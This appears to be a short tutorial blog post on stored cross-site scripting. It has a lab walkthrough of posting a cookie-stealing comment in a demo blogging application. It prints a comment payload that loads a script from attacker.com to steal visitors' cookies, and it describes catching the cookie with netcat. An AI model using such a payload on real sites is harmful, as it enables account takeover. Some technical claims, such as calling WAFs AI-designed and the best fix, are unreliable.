Introduction to Stored XSS
When an attacker browsing a web application and found a vulnerability which allows him to embed an HTML tag into the input box and the embedded tag become a permanent item of that page and then the browser will parse this code every time whenever the page will get loaded.
For example in a blogging website attacker found a vulnerability in the comment section and embed this comment.
Attacker’s Comment — Nice Blog! a similar type of blog I have also written but with some new content, please visit my site to read more
<script src=”http://attacker.com/stealcookie.js”> </script>
The “stealcookie.js” is designed to steal the cookie of the browser and as this file is hosted in some other site so that the attacker can able to access it remotely and when the user’s account gets compromised then the attacker will have full control to the user account.
But the user will have no idea at all what is happening in the background with this piece of comment.
Examples of Stored XSS
How to prevent Stored XSS attack?
To prevent any XSS attack, Web Application Firewall (WAF) is the best solution to protect a web application.
WAF is an automation tool which is designed by artificial intelligence and machine learning algorithms to filter specific content of web application and it can prevent attacks from XSS, SQL Injection, File inclusion and security misconfiguration.
Every time whenever a user will send any request to the web server first the request will go the WAF and WAF will filter the request and then the request will get transferred to the web server.
Same will be applied to the Web server also when the web server will send the response to the user first the response will go to the WAF then WAF will filter the response then it will get transferred to the user.
For more information
How to perform Stored XSS in a Blogging web application?
Now please choose Cross-site-Scripting — Stored (Blog) from the drop-down menu and click Hack.
As you can see from the screenshot it’s a demo blogging application and there is an input box where user can comment.
So to test let’s enter one comment “Nice Blog” and hit submit.
As you can see from the screenshot the comment gets posted and this comment gets stored in the database.
Payload comment to steal the cookie
Nice Blog! a similar type of blog I have also written but with some new content, please visit my site to read more
And I’ll fetch this request with the netcat command through a reverse shell.
As you can see from the screenshot after posting the comment immediately I received the connection with the browser cookie.
This is one way to steal the cookie and there are several techniques where an attacker can steal the cookie of the browser and every time when you load the webpage the code will get executed and it will fetch the browser cookie.
So that attacker can access anybody browser cookie whoever visit this webpage.
For more information
I hope you guys like this post-bye bye for now
Happy Hacking :)